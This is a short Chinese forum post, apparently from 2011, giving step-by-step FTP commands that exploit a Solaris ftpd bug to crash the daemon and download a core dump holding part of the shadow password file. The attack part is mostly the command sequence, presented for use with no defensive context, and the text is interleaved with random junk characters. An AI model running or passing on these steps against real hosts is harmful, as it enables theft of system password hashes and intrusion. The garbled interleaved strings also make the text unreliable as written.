该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
# v4 J, n* k/ b1 Q* k O
0 O3 o D5 I- V2 I+ L z% ~1 J9 w1.通过 ftp 正常登录到目的主机上
! i* _5 l" Y1 x% c, o# q
- }; x' R! A6 x9 E! Q2.输入如下命令序列:: _/ p: N9 Z8 k4 p& h6 q8 g
- U6 J- }# V0 ] S! {ftp> user root wrongpasswd
* |7 r: \0 @) P& y% b, N
3 O4 s% c" x! k. S8 j8 B( A G( Sftp> quote pasv' y$ G& r, Q$ ? Q% a& g
! u$ `- _' L p! f$ `
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
' O$ J& |7 [2 C
4 d; l! x" s/ g( Y$ j( V! H4.再次进入FTP >get core7 D( U& R' w2 j/ x- a/ T; {7 x
0 r2 y) H) M0 K0 K, Q! g
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了) J8 E- w' }$ m, U6 t
! W; O Y$ I, f$ f$ O7 j- ]
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡